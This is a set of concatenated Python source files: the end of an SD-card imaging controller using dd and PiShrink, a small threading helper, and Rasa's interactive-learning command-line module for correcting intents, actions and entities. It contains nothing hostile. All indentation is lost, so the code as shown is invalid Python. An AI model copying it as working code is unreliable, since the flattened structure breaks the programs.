for out in self.execute(cmd):
self.dd_prog_msg = out
print(out, end="")
self.dd_prog_msg = "image zipped"
def ImageProcessor(self, sd_card, img_name, tozip=True, reset=True):
img_dir = self.local_dir+img_name
print("image name", img_dir)
self.MakeSDImage(sd_card, img_dir)
self.status = "Pi shrink"
self.PiShrink(img_dir, tozip, reset)
self.status = "Image Ready"
self.dd_prog_msg = "process complete"
self.dd_prog_msg = ""
if __name__ == "__main__":
sc = ShellController()
Thread(target=sc.ImageProcessor, args=('/dev/sdg', "test.img")).start()
# sc.ImageProcessor('/dev/sdg', "test.img", zip=False)
# 21404581888 bytes (21 GB, 20 GiB) copied, 726 s, 29.5 MB/s
# sc.formatDDOutput("21404581888 bytes (21 GB, 20 GiB) copied, 726 s, 29.5 MB/s")
# sc.MakeSDImage("/dev/sda", "python.img")
# sc.MakeSDImage("/dev/sdg", sc.local_dir+"python.img")
# sc.PiShrink(sc.local_dir+"python.img", zip=True)
# res = sc.USBDeviceList()
# print(res.keys())
# print(res['/dev/sda'].get('ID_MODEL'))
|
thread.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
"""Utility functions for operating with threads"""
import threading # noqa
from typing import Callable # noqa
def run_as_thread(function: Callable, *args) -> threading.Thread:
"""Runs a function in a thread, passing in the specified args as its arguments and returns the thread"""
task = threading.Thread(target=function, args=args)
task.daemon = False
task.start()
return task
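# Minimal usage sketch (the polling function below is an assumption for the example):
#   def poll_health(url: str, interval: int) -> None:
#       ...
#   worker = run_as_thread(poll_health, "http://localhost:8080/health", 5)
#   worker.join()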
|
interactive.py
|
import asyncio
import logging
import os
import tempfile
import textwrap
import uuid
from functools import partial
from multiprocessing import Process
from typing import Any, Callable, Dict, List, Optional, Text, Tuple, Union
import numpy as np
from aiohttp import ClientError
from colorclass import Color
from sanic import Sanic, response
from sanic.exceptions import NotFound
from terminaltables import AsciiTable, SingleTable
import questionary
import rasa.cli.utils
from questionary import Choice, Form, Question
from rasa.cli import utils as cliutils
from rasa.core import constants, run, train, utils
from rasa.core.actions.action import ACTION_LISTEN_NAME, default_action_names
from rasa.core.channels.channel import UserMessage
from rasa.core.constants import (
DEFAULT_SERVER_FORMAT,
DEFAULT_SERVER_PORT,
DEFAULT_SERVER_URL,
REQUESTED_SLOT,
UTTER_PREFIX,
)
from rasa.core.domain import Domain
import rasa.core.events
from rasa.core.events import (
ActionExecuted,
ActionReverted,
BotUttered,
Event,
Restarted,
UserUttered,
UserUtteranceReverted,
)
from rasa.core.interpreter import INTENT_MESSAGE_PREFIX, NaturalLanguageInterpreter
from rasa.core.trackers import EventVerbosity, DialogueStateTracker
from rasa.core.training import visualization
from rasa.core.training.structures import Story
from rasa.core.training.visualization import (
VISUALIZATION_TEMPLATE_PATH,
visualize_neighborhood,
)
from rasa.core.utils import AvailableEndpoints
from rasa.utils.common import update_sanic_log_level
from rasa.utils.endpoints import EndpointConfig
# noinspection PyProtectedMember
from rasa.nlu.training_data import loading
from rasa.nlu.training_data.message import Message
# WARNING: This command line UI is using an external library
# communicating with the shell - these functions are hard to test
# automatically. If you change anything in here, please make sure to
# run the interactive learning and check if your part of the "ui"
# still works.
import rasa.utils.io as io_utils
logger = logging.getLogger(__name__)
MAX_VISUAL_HISTORY = 3
PATHS = {
"stories": "data/stories.md",
"nlu": "data/nlu.md",
"backup": "data/nlu_interactive.md",
"domain": "domain.yml",
}
SAVE_IN_E2E = False
# choose other intent, making sure this doesn't clash with an existing intent
OTHER_INTENT = uuid.uuid4().hex
OTHER_ACTION = uuid.uuid4().hex
NEW_ACTION = uuid.uuid4().hex
NEW_TEMPLATES = {}
class RestartConversation(Exception):
"""Exception used to break out the flow and restart the conversation."""
pass
class ForkTracker(Exception):
"""Exception used to break out the flow and fork at a previous step.
The tracker will be reset to the selected point in the past and the
conversation will continue from there."""
pass
class UndoLastStep(Exception):
"""Exception used to break out the flow and undo the last step.
The last step is either the most recent user message or the most
recent action run by the bot."""
pass
class Abort(Exception):
"""Exception used to abort the interactive learning and exit."""
pass
async def send_message(
endpoint: EndpointConfig,
sender_id: Text,
message: Text,
parse_data: Optional[Dict[Text, Any]] = None,
) -> Dict[Text, Any]:
"""Send a user message to a conversation."""
payload = {
"sender": UserUttered.type_name,
"text": message,
"parse_data": parse_data,
}
return await endpoint.request(
json=payload,
method="post",
subpath="/conversations/{}/messages".format(sender_id),
)
async def request_prediction(
endpoint: EndpointConfig, sender_id: Text
) -> Dict[Text, Any]:
"""Request the next action prediction from core."""
return await endpoint.request(
method="post", subpath="/conversations/{}/predict".format(sender_id)
)
async def retrieve_domain(endpoint: EndpointConfig) -> Dict[Text, Any]:
"""Retrieve the domain from core."""
return await endpoint.request(
method="get", subpath="/domain", headers={"Accept": "application/json"}
)
async def retrieve_status(endpoint: EndpointConfig) -> Dict[Text, Any]:
"""Retrieve the status from core."""
return await endpoint.request(method="get", subpath="/status")
async def retrieve_tracker(
endpoint: EndpointConfig,
sender_id: Text,
verbosity: EventVerbosity = EventVerbosity.ALL,
) -> Dict[Text, Any]:
"""Retrieve a tracker from core."""
path = "/conversations/{}/tracker?include_events={}".format(
sender_id, verbosity.name
)
return await endpoint.request(
method="get", subpath=path, headers={"Accept": "application/json"}
)
async def send_action(
endpoint: EndpointConfig,
sender_id: Text,
action_name: Text,
policy: Optional[Text] = None,
confidence: Optional[float] = None,
is_new_action: bool = False,
) -> Dict[Text, Any]:
"""Log an action to a conversation."""
payload = ActionExecuted(action_name, policy, confidence).as_dict()
subpath = "/conversations/{}/execute".format(sender_id)
try:
return await endpoint.request(json=payload, method="post", subpath=subpath)
except ClientError:
if is_new_action:
if action_name in NEW_TEMPLATES:
warning_questions = questionary.confirm(
"WARNING: You have created a new action: '{0}', "
"with matching template: '{1}'. "
"This action will not return its message in this session, "
"but the new utterance will be saved to your domain file "
"when you exit and save this session. "
"You do not need to do anything further. "
"".format(action_name, [*NEW_TEMPLATES[action_name]][0])
)
await _ask_questions(warning_questions, sender_id, endpoint)
else:
warning_questions = questionary.confirm(
"WARNING: You have created a new action: '{}', "
"which was not successfully executed. "
"If this action does not return any events, "
"you do not need to do anything. "
"If this is a custom action which returns events, "
"you are recommended to implement this action "
"in your action server and try again."
"".format(action_name)
)
await _ask_questions(warning_questions, sender_id, endpoint)
payload = ActionExecuted(action_name).as_dict()
return await send_event(endpoint, sender_id, payload)
else:
logger.error("failed to execute action!")
raise
async def send_event(
endpoint: EndpointConfig,
sender_id: Text,
evt: Union[List[Dict[Text, Any]], Dict[Text, Any]],
) -> Dict[Text, Any]:
"""Log an event to a conversation."""
subpath = "/conversations/{}/tracker/events".format(sender_id)
return await endpoint.request(json=evt, method="post", subpath=subpath)
def format_bot_output(message: BotUttered) -> Text:
"""Format a bot response to be displayed in the history table."""
# First, add text to output
output = message.text or ""
# Then, append all additional items
data = message.data or {}
if not data:
return output
if data.get("image"):
output += "\nImage: " + data.get("image")
if data.get("attachment"):
output += "\nAttachment: " + data.get("attachment")
if data.get("buttons"):
output += "\nButtons:"
choices = cliutils.button_choices_from_message_data(
data, allow_free_text_input=True
)
for choice in choices:
output += "\n" + choice
if data.get("elements"):
output += "\nElements:"
for idx, element in enumerate(data.get("elements")):
element_str = cliutils.element_to_string(element, idx)
output += "\n" + element_str
if data.get("quick_replies"):
output += "\nQuick replies:"
for idx, element in enumerate(data.get("quick_replies")):
element_str = cliutils.element_to_string(element, idx)
output += "\n" + element_str
return output
def latest_user_message(events: List[Dict[Text, Any]]) -> Optional[Dict[Text, Any]]:
"""Return most recent user message."""
for i, e in enumerate(reversed(events)):
if e.get("event") == UserUttered.type_name:
return e
return None
def all_events_before_latest_user_msg(
events: List[Dict[Text, Any]]
) -> List[Dict[Text, Any]]:
"""Return all events that happened before the most recent user message."""
for i, e in enumerate(reversed(events)):
if e.get("event") == UserUttered.type_name:
return events[: -(i + 1)]
return events
async def _ask_questions(
questions: Union[Form, Question],
sender_id: Text,
endpoint: EndpointConfig,
is_abort: Callable[[Dict[Text, Any]], bool] = lambda x: False,
) -> Any:
"""Ask the user a question, if Ctrl-C is pressed provide user with menu."""
should_retry = True
answers = {}
while should_retry:
answers = questions.ask()
if answers is None or is_abort(answers):
should_retry = await _ask_if_quit(sender_id, endpoint)
else:
should_retry = False
return answers
def _selection_choices_from_intent_prediction(
predictions: List[Dict[Text, Any]]
) -> List[Dict[Text, Any]]:
""""Given a list of ML predictions create a UI choice list."""
sorted_intents = sorted(predictions, key=lambda k: (-k["confidence"], k["name"]))
choices = []
for p in sorted_intents:
name_with_confidence = "{:03.2f} {:40}".format(
p.get("confidence"), p.get("name")
)
choice = {"name": name_with_confidence, "value": p.get("name")}
choices.append(choice)
return choices
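# Illustrative example (assumed predictions, not from the original module):
#   _selection_choices_from_intent_prediction([
#       {"name": "goodbye", "confidence": 0.05},
#       {"name": "greet", "confidence": 0.92},
#   ])
#   # -> [{"name": "0.92 greet", "value": "greet"}, {"name": "0.05 goodbye", "value": "goodbye"}]
#   # (displayed names are padded to 40 characters and sorted by descending confidence)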
async def _request_free_text_intent(sender_id: Text, endpoint: EndpointConfig) -> Text:
question = questionary.text(
message="Please type the intent name:",
validate=io_utils.not_empty_validator("Please enter an intent name"),
)
return await _ask_questions(question, sender_id, endpoint)
async def _request_free_text_action(sender_id: Text, endpoint: EndpointConfig) -> Text:
question = questionary.text(
message="Please type the action name:",
validate=io_utils.not_empty_validator("Please enter an action name"),
)
return await _ask_questions(question, sender_id, endpoint)
async def _request_free_text_utterance(
sender_id: Text, endpoint: EndpointConfig, action: Text
) -> Text:
question = questionary.text(
message=(
"Please type the message for your new utterance "
"template '{}':".format(action)
),
validate=io_utils.not_empty_validator("Please enter a template message"),
)
return await _ask_questions(question, sender_id, endpoint)
async def _request_selection_from_intents(
intents: List[Dict[Text, Text]], sender_id: Text, endpoint: EndpointConfig
) -> Text:
question = questionary.select("What intent is it?", choices=intents)
return await _ask_questions(question, sender_id, endpoint)
async def _request_fork_point_from_list(
forks: List[Dict[Text, Text]], sender_id: Text, endpoint: EndpointConfig
) -> Text:
question = questionary.select(
"Before which user message do you want to fork?", choices=forks
)
return await _ask_questions(question, sender_id, endpoint)
async def _request_fork_from_user(
sender_id, endpoint
) -> Optional[List[Dict[Text, Any]]]:
"""Take in a conversation and ask at which point to fork the conversation.
Returns the list of events that should be kept. Forking means the
conversation will be reset and continued from this previous point."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.AFTER_RESTART)
choices = []
for i, e in enumerate(tracker.get("events", [])):
if e.get("event") == UserUttered.type_name:
choices.append({"name": e.get("text"), "value": i})
fork_idx = await _request_fork_point_from_list(
list(reversed(choices)), sender_id, endpoint
)
if fork_idx is not None:
return tracker.get("events", [])[: int(fork_idx)]
else:
return None
async def _request_intent_from_user(
latest_message, intents, sender_id, endpoint
) -> Dict[Text, Any]:
"""Take in latest message and ask which intent it should have been.
Returns the intent dict that has been selected by the user."""
predictions = latest_message.get("parse_data", {}).get("intent_ranking", [])
predicted_intents = {p["name"] for p in predictions}
for i in intents:
if i not in predicted_intents:
predictions.append({"name": i, "confidence": 0.0})
# convert intents to ui list and add <other> as a free text alternative
choices = [
{"name": "<create_new_intent>", "value": OTHER_INTENT}
] + _selection_choices_from_intent_prediction(predictions)
intent_name = await _request_selection_from_intents(choices, sender_id, endpoint)
if intent_name == OTHER_INTENT:
intent_name = await _request_free_text_intent(sender_id, endpoint)
selected_intent = {"name": intent_name, "confidence": 1.0}
else:
# returns the selected intent with the original probability value
selected_intent = next(
(x for x in predictions if x["name"] == intent_name), {"name": None}
)
return selected_intent
async def _print_history(sender_id: Text, endpoint: EndpointConfig) -> None:
"""Print information about the conversation for the user."""
tracker_dump = await retrieve_tracker(
endpoint, sender_id, EventVerbosity.AFTER_RESTART
)
events = tracker_dump.get("events", [])
table = _chat_history_table(events)
slot_strs = _slot_history(tracker_dump)
print ("------")
print ("Chat History\n")
print (table)
if slot_strs:
print ("\n")
print ("Current slots: \n\t{}\n".format(", ".join(slot_strs)))
print ("------")
def _chat_history_table(events: List[Dict[Text, Any]]) -> Text:
"""Create a table containing bot and user messages.
Also includes additional information, like any events and
prediction probabilities."""
def wrap(txt: Text, max_width: int) -> Text:
return "\n".join(textwrap.wrap(txt, max_width, replace_whitespace=False))
def colored(txt: Text, color: Text) -> Text:
return "{" + color + "}" + txt + "{/" + color + "}"
def format_user_msg(user_event: UserUttered, max_width: int) -> Text:
intent = user_event.intent or {}
intent_name = intent.get("name", "")
_confidence = intent.get("confidence", 1.0)
_md = _as_md_message(user_event.parse_data)
_lines = [
colored(wrap(_md, max_width), "hired"),
"intent: {} {:03.2f}".format(intent_name, _confidence),
]
return "\n".join(_lines)
def bot_width(_table: AsciiTable) -> int:
return _table.column_max_width(1)
def user_width(_table: AsciiTable) -> int:
return _table.column_max_width(3)
def add_bot_cell(data, cell):
data.append([len(data), Color(cell), "", ""])
def add_user_cell(data, cell):
data.append([len(data), "", "", Color(cell)])
# prints the historical interactions between the bot and the user,
# to help with correctly identifying the action
table_data = [
[
"# ",
Color(colored("Bot ", "autoblue")),
" ",
Color(colored("You ", "hired")),
]
]
table = SingleTable(table_data, "Chat History")
bot_column = []
tracker = DialogueStateTracker.from_dict("any", events)
applied_events = tracker.applied_events()
for idx, event in enumerate(applied_events):
if isinstance(event, ActionExecuted):
bot_column.append(colored(event.action_name, "autocyan"))
if event.confidence is not None:
bot_column[-1] += colored(
" {:03.2f}".format(event.confidence), "autowhite"
)
elif isinstance(event, UserUttered):
if bot_column:
text = "\n".join(bot_column)
add_bot_cell(table_data, text)
bot_column = []
msg = format_user_msg(event, user_width(table))
add_user_cell(table_data, msg)
elif isinstance(event, BotUttered):
wrapped = wrap(format_bot_output(event), bot_width(table))
bot_column.append(colored(wrapped, "autoblue"))
else:
if event.as_story_string():
bot_column.append(wrap(event.as_story_string(), bot_width(table)))
if bot_column:
text = "\n".join(bot_column)
add_bot_cell(table_data, text)
table.inner_heading_row_border = False
table.inner_row_border = True
table.inner_column_border = False
table.outer_border = False
table.justify_columns = {0: "left", 1: "left", 2: "center", 3: "right"}
return table.table
def _slot_history(tracker_dump: Dict[Text, Any]) -> List[Text]:
"""Create an array of slot representations to be displayed."""
slot_strs = []
for k, s in tracker_dump.get("slots", {}).items():
colored_value = cliutils.wrap_with_color(
str(s), color=rasa.cli.utils.bcolors.WARNING
)
slot_strs.append("{}: {}".format(k, colored_value))
return slot_strs
async def _write_data_to_file(sender_id: Text, endpoint: EndpointConfig):
"""Write stories and nlu data to file."""
story_path, nlu_path, domain_path = _request_export_info()
tracker = await retrieve_tracker(endpoint, sender_id)
events = tracker.get("events", [])
serialised_domain = await retrieve_domain(endpoint)
domain = Domain.from_dict(serialised_domain)
await _write_stories_to_file(story_path, events, domain)
await _write_nlu_to_file(nlu_path, events)
await _write_domain_to_file(domain_path, events, domain)
logger.info("Successfully wrote stories and NLU data")
async def _ask_if_quit(sender_id: Text, endpoint: EndpointConfig) -> bool:
"""Display the exit menu.
Return `True` if the previous question should be retried."""
answer = questionary.select(
message="Do you want to stop?",
choices=[
Choice("Continue", "continue"),
Choice("Undo Last", "undo"),
Choice("Fork", "fork"),
Choice("Start Fresh", "restart"),
Choice("Export & Quit", "quit"),
],
).ask()
if not answer or answer == "quit":
# this is also the default answer if the user presses Ctrl-C
await _write_data_to_file(sender_id, endpoint)
raise Abort()
elif answer == "continue":
# in this case we will just return, and the original
# question will get asked again
return True
elif answer == "undo":
raise UndoLastStep()
elif answer == "fork":
raise ForkTracker()
elif answer == "restart":
raise RestartConversation()
async def _request_action_from_user(
predictions: List[Dict[Text, Any]], sender_id: Text, endpoint: EndpointConfig
) -> Tuple[Text, bool]:
"""Ask the user to correct an action prediction."""
await _print_history(sender_id, endpoint)
choices = [
{
"name": "{:03.2f} {:40}".format(a.get("score"), a.get("action")),
"value": a.get("action"),
}
for a in predictions
]
tracker = await retrieve_tracker(endpoint, sender_id)
events = tracker.get("events", [])
session_actions_all = [a["name"] for a in _collect_actions(events)]
session_actions_unique = list(set(session_actions_all))
old_actions = [action["value"] for action in choices]
new_actions = [
{"name": action, "value": OTHER_ACTION + action}
for action in session_actions_unique
if action not in old_actions
]
choices = (
[{"name": "<create new action>", "value": NEW_ACTION}] + new_actions + choices
)
question = questionary.select("What is the next action of the bot?", choices)
action_name = await _ask_questions(question, sender_id, endpoint)
is_new_action = action_name == NEW_ACTION
if is_new_action:
# create new action
action_name = await _request_free_text_action(sender_id, endpoint)
if action_name.startswith(UTTER_PREFIX):
utter_message = await _request_free_text_utterance(
sender_id, endpoint, action_name
)
NEW_TEMPLATES[action_name] = {utter_message: ""}
elif action_name[:32] == OTHER_ACTION:
# action was newly created in the session, but not this turn
is_new_action = True
action_name = action_name[32:]
print ("Thanks! The bot will now run {}.\n".format(action_name))
return action_name, is_new_action
def _request_export_info() -> Tuple[Text, Text, Text]:
"""Request file path and export stories & nlu data to that path"""
# export training data and quit
questions = questionary.form(
export_stories=questionary.text(
message="Export stories to (if file exists, this "
"will append the stories)",
default=PATHS["stories"],
validate=io_utils.file_type_validator(
[".md"],
"Please provide a valid export path for the stories, e.g. 'stories.md'.",
),
),
export_nlu=questionary.text(
message="Export NLU data to (if file exists, this will "
"merge learned data with previous training examples)",
default=PATHS["nlu"],
validate=io_utils.file_type_validator(
[".md"],
"Please provide a valid export path for the NLU data, e.g. 'nlu.md'.",
),
),
export_domain=questionary.text(
message="Export domain file to (if file exists, this "
"will be overwritten)",
default=PATHS["domain"],
validate=io_utils.file_type_validator(
[".yml", ".yaml"],
"Please provide a valid export path for the domain file, e.g. 'domain.yml'.",
),
),
)
answers = questions.ask()
if not answers:
raise Abort()
return (answers["export_stories"], answers["export_nlu"], answers["export_domain"])
def _split_conversation_at_restarts(
events: List[Dict[Text, Any]]
) -> List[List[Dict[Text, Any]]]:
"""Split a conversation at restart events.
Returns an array of event lists, without the restart events."""
sub_conversations = []
current = []
for e in events:
if e.get("event") == "restart":
if current:
sub_conversations.append(current)
current = []
else:
current.append(e)
if current:
sub_conversations.append(current)
return sub_conversations
def _collect_messages(events: List[Dict[Text, Any]]) -> List[Message]:
"""Collect the message text and parsed data from the UserMessage events
into a list"""
from rasa.nlu.extractors.duckling_http_extractor import DucklingHTTPExtractor
from rasa.nlu.extractors.mitie_entity_extractor import MitieEntityExtractor
from rasa.nlu.extractors.spacy_entity_extractor import SpacyEntityExtractor
msgs = []
for event in events:
if event.get("event") == UserUttered.type_name:
data = event.get("parse_data", {})
            for entity in list(data.get("entities", [])):  # copy, entries may be removed below
excluded_extractors = [
DucklingHTTPExtractor.__name__,
SpacyEntityExtractor.__name__,
MitieEntityExtractor.__name__,
]
                logger.debug(
                    "Excluding entity markup of the following extractors"
                    " {} when writing NLU data"
                    " to file.".format(excluded_extractors)
                )
if entity.get("extractor") in excluded_extractors:
data["entities"].remove(entity)
msg = Message.build(data["text"], data["intent"]["name"], data["entities"])
msgs.append(msg)
elif event.get("event") == UserUtteranceReverted.type_name and msgs:
msgs.pop() # user corrected the nlu, remove incorrect example
return msgs
def _collect_actions(events: List[Dict[Text, Any]]) -> List[Dict[Text, Any]]:
"""Collect all the `ActionExecuted` events into a list."""
return [evt for evt in events if evt.get("event") == ActionExecuted.type_name]
async def _write_stories_to_file(
export_story_path: Text, events: List[Dict[Text, Any]], domain: Domain
) -> None:
"""Write the conversation of the sender_id to the file paths."""
sub_conversations = _split_conversation_at_restarts(events)
io_utils.create_path(export_story_path)
if os.path.exists(export_story_path):
append_write = "a" # append if already exists
else:
append_write = "w" # make a new file if not
with open(export_story_path, append_write, encoding="utf-8") as f:
i = 1
for conversation in sub_conversations:
parsed_events = rasa.core.events.deserialise_events(conversation)
tracker = DialogueStateTracker.from_events(
"interactive_story_{}".format(i), evts=parsed_events, slots=domain.slots
)
if any(
isinstance(event, UserUttered) for event in tracker.applied_events()
):
i += 1
f.write("\n" + tracker.export_stories(SAVE_IN_E2E))
async def _write_nlu_to_file(
export_nlu_path: Text, events: List[Dict[Text, Any]]
) -> None:
"""Write the nlu data of the sender_id to the file paths."""
from rasa.nlu.training_data import TrainingData
msgs = _collect_messages(events)
# noinspection PyBroadException
try:
previous_examples = loading.load_data(export_nlu_path)
except Exception as e:
logger.debug(
"An exception occurred while trying to load the NLU data. {}".format(str(e))
)
# No previous file exists, use empty training data as replacement.
previous_examples = TrainingData()
nlu_data = previous_examples.merge(TrainingData(msgs))
    # guess the format of the existing file before opening it for writing,
    # so we do not read from a file we are about to overwrite
if loading.guess_format(export_nlu_path) in {"md", "unk"}:
fformat = "md"
else:
fformat = "json"
with open(export_nlu_path, "w", encoding="utf-8") as f:
if fformat == "md":
f.write(nlu_data.nlu_as_markdown())
else:
f.write(nlu_data.nlu_as_json())
def _entities_from_messages(messages):
"""Return all entities that occur in atleast one of the messages."""
return list({e["entity"] for m in messages for e in m.data.get("entities", [])})
def _intents_from_messages(messages):
"""Return all intents that occur in at least one of the messages."""
# set of distinct intents
distinct_intents = {m.data["intent"] for m in messages if "intent" in m.data}
return distinct_intents
async def _write_domain_to_file(
domain_path: Text, events: List[Dict[Text, Any]], old_domain: Domain
) -> None:
"""Write an updated domain file to the file path."""
io_utils.create_path(domain_path)
messages = _collect_messages(events)
actions = _collect_actions(events)
templates = NEW_TEMPLATES
# TODO for now there is no way to distinguish between action and form
collected_actions = list(
{e["name"] for e in actions if e["name"] not in default_action_names()}
)
new_domain = Domain(
intents=_intents_from_messages(messages),
entities=_entities_from_messages(messages),
slots=[],
templates=templates,
action_names=collected_actions,
form_names=[],
)
old_domain.merge(new_domain).persist_clean(domain_path)
async def _predict_till_next_listen(
endpoint: EndpointConfig,
sender_id: Text,
sender_ids: List[Text],
plot_file: Optional[Text],
) -> None:
"""Predict and validate actions until we need to wait for a user message."""
listen = False
while not listen:
result = await request_prediction(endpoint, sender_id)
predictions = result.get("scores")
probabilities = [prediction["score"] for prediction in predictions]
pred_out = int(np.argmax(probabilities))
action_name = predictions[pred_out].get("action")
policy = result.get("policy")
confidence = result.get("confidence")
await _print_history(sender_id, endpoint)
await _plot_trackers(
sender_ids, plot_file, endpoint, unconfirmed=[ActionExecuted(action_name)]
)
listen = await _validate_action(
action_name, policy, confidence, predictions, endpoint, sender_id
)
await _plot_trackers(sender_ids, plot_file, endpoint)
tracker_dump = await retrieve_tracker(
endpoint, sender_id, EventVerbosity.AFTER_RESTART
)
events = tracker_dump.get("events", [])
if len(events) >= 2:
last_event = events[-2] # last event before action_listen
# if bot message includes buttons the user will get a list choice to reply
# the list choice is displayed in place of action listen
if last_event.get("event") == BotUttered.type_name and last_event["data"].get(
"buttons", None
):
response = _get_button_choice(last_event)
if response != cliutils.FREE_TEXT_INPUT_PROMPT:
await send_message(endpoint, sender_id, response)
def _get_button_choice(last_event: Dict[Text, Any]) -> Text:
data = last_event["data"]
message = last_event.get("text", "")
choices = cliutils.button_choices_from_message_data(
data, allow_free_text_input=True
)
question = questionary.select(message, choices)
response = cliutils.payload_from_button_question(question)
return response
async def _correct_wrong_nlu(
corrected_nlu: Dict[Text, Any],
events: List[Dict[Text, Any]],
endpoint: EndpointConfig,
sender_id: Text,
) -> None:
"""A wrong NLU prediction got corrected, update core's tracker."""
revert_latest_user_utterance = UserUtteranceReverted().as_dict()
# `UserUtteranceReverted` also removes the `ACTION_LISTEN` event before, hence we
# have to replay it.
listen_for_next_message = ActionExecuted(ACTION_LISTEN_NAME).as_dict()
corrected_message = latest_user_message(events)
if corrected_message is None:
raise Exception("Failed to correct NLU data. User message not found.")
corrected_message["parse_data"] = corrected_nlu
await send_event(
endpoint,
sender_id,
[revert_latest_user_utterance, listen_for_next_message, corrected_message],
)
async def _correct_wrong_action(
corrected_action: Text,
endpoint: EndpointConfig,
sender_id: Text,
is_new_action: bool = False,
) -> None:
"""A wrong action prediction got corrected, update core's tracker."""
await send_action(
endpoint, sender_id, corrected_action, is_new_action=is_new_action
)
def _form_is_rejected(action_name, tracker):
"""Check if the form got rejected with the most recent action name."""
return (
tracker.get("active_form", {}).get("name")
and action_name != tracker["active_form"]["name"]
and action_name != ACTION_LISTEN_NAME
)
def _form_is_restored(action_name, tracker):
"""Check whether the form is called again after it was rejected."""
return (
tracker.get("active_form", {}).get("rejected")
and tracker.get("latest_action_name") == ACTION_LISTEN_NAME
and action_name == tracker.get("active_form", {}).get("name")
)
async def _confirm_form_validation(action_name, tracker, endpoint, sender_id):
"""Ask a user whether an input for a form should be validated.
    Prior to this call, the active form was chosen again after it had been rejected."""
requested_slot = tracker.get("slots", {}).get(REQUESTED_SLOT)
validation_questions = questionary.confirm(
"Should '{}' validate user input to fill "
"the slot '{}'?".format(action_name, requested_slot)
)
validate_input = await _ask_questions(validation_questions, sender_id, endpoint)
if not validate_input:
# notify form action to skip validation
await send_event(
endpoint, sender_id, {"event": "form_validation", "validate": False}
)
elif not tracker.get("active_form", {}).get("validate"):
# handle contradiction with learned behaviour
warning_question = questionary.confirm(
"ERROR: FormPolicy predicted no form validation "
"based on previous training stories. "
"Make sure to remove contradictory stories "
"from training data. "
"Otherwise predicting no form validation "
"will not work as expected."
)
await _ask_questions(warning_question, sender_id, endpoint)
# notify form action to validate an input
await send_event(
endpoint, sender_id, {"event": "form_validation", "validate": True}
)
async def _validate_action(
action_name: Text,
policy: Text,
confidence: float,
predictions: List[Dict[Text, Any]],
endpoint: EndpointConfig,
sender_id: Text,
) -> bool:
"""Query the user to validate if an action prediction is correct.
Returns `True` if the prediction is correct, `False` otherwise."""
question = questionary.confirm(
"The bot wants to run '{}', correct?".format(action_name)
)
is_correct = await _ask_questions(question, sender_id, endpoint)
if not is_correct:
action_name, is_new_action = await _request_action_from_user(
predictions, sender_id, endpoint
)
else:
is_new_action = False
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.AFTER_RESTART)
if _form_is_rejected(action_name, tracker):
# notify the tracker that form was rejected
await send_event(
endpoint,
sender_id,
{
"event": "action_execution_rejected",
"name": tracker["active_form"]["name"],
},
)
elif _form_is_restored(action_name, tracker):
await _confirm_form_validation(action_name, tracker, endpoint, sender_id)
if not is_correct:
await _correct_wrong_action(
action_name, endpoint, sender_id, is_new_action=is_new_action
)
else:
await send_action(endpoint, sender_id, action_name, policy, confidence)
return action_name == ACTION_LISTEN_NAME
def _as_md_message(parse_data: Dict[Text, Any]) -> Text:
"""Display the parse data of a message in markdown format."""
from rasa.nlu.training_data.formats import MarkdownWriter
if parse_data.get("text", "").startswith(INTENT_MESSAGE_PREFIX):
return parse_data["text"]
if not parse_data.get("entities"):
parse_data["entities"] = []
# noinspection PyProtectedMember
return MarkdownWriter()._generate_message_md(parse_data)
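# Illustrative sketch only (not part of the original module): a never-called
# example of the markdown produced for a parsed message; the parse data below
# is hypothetical.
def _example_as_md_message() -> None:
    parse_data = {
        "text": "I live in Berlin",
        "intent": {"name": "inform", "confidence": 0.9},
        "entities": [
            {"start": 10, "end": 16, "value": "Berlin", "entity": "city"}
        ],
    }
    # Entities are rendered inline using [value](entity) notation,
    # e.g. "I live in [Berlin](city)".
    print(_as_md_message(parse_data))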
def _validate_user_regex(latest_message: Dict[Text, Any], intents: List[Text]) -> bool:
"""Validate if a users message input is correct.
This assumes the user entered an intent directly, e.g. using
`/greet`. Return `True` if the intent is a known one."""
parse_data = latest_message.get("parse_data", {})
intent = parse_data.get("intent", {}).get("name")
if intent in intents:
return True
else:
return False
async def _validate_user_text(
latest_message: Dict[Text, Any], endpoint: EndpointConfig, sender_id: Text
) -> bool:
"""Validate a user message input as free text.
This assumes the user message is a text message (so NOT `/greet`)."""
parse_data = latest_message.get("parse_data", {})
text = _as_md_message(parse_data)
intent = parse_data.get("intent", {}).get("name")
entities = parse_data.get("entities", [])
if entities:
message = (
"Is the intent '{}' correct for '{}' and are "
"all entities labeled correctly?".format(intent, text)
)
else:
message = (
"Your NLU model classified '{}' with intent '{}'"
" and there are no entities, is this correct?".format(text, intent)
)
if intent is None:
print ("The NLU classification for '{}' returned '{}'".format(text, intent))
return False
else:
question = questionary.confirm(message)
return await _ask_questions(question, sender_id, endpoint)
async def _validate_nlu(
intents: List[Text], endpoint: EndpointConfig, sender_id: Text
) -> None:
"""Validate if a user message, either text or intent is correct.
If the prediction of the latest user message is incorrect,
the tracker will be corrected with the correct intent / entities."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.AFTER_RESTART)
latest_message = latest_user_message(tracker.get("events", [])) or {}
if latest_message.get("text", "").startswith( # pytype: disable=attribute-error
INTENT_MESSAGE_PREFIX
):
valid = _validate_user_regex(latest_message, intents)
else:
valid = await _validate_user_text(latest_message, endpoint, sender_id)
if not valid:
corrected_intent = await _request_intent_from_user(
latest_message, intents, sender_id, endpoint
)
# corrected intents have confidence 1.0
corrected_intent["confidence"] = 1.0
events = tracker.get("events", [])
entities = await _correct_entities(latest_message, endpoint, sender_id)
corrected_nlu = {
"intent": corrected_intent,
"entities": entities,
"text": latest_message.get("text"),
}
await _correct_wrong_nlu(corrected_nlu, events, endpoint, sender_id)
async def _correct_entities(
latest_message: Dict[Text, Any], endpoint: EndpointConfig, sender_id: Text
) -> List[Dict[Text, Any]]:
"""Validate the entities of a user message.
Returns the corrected entities"""
from rasa.nlu.training_data.formats import MarkdownReader
parse_original = latest_message.get("parse_data", {})
entity_str = _as_md_message(parse_original)
question = questionary.text(
"Please mark the entities using [value](type) notation", default=entity_str
)
annotation = await _ask_questions(question, sender_id, endpoint)
# noinspection PyProtectedMember
parse_annotated = MarkdownReader()._parse_training_example(annotation)
corrected_entities = _merge_annotated_and_original_entities(
parse_annotated, parse_original
)
return corrected_entities
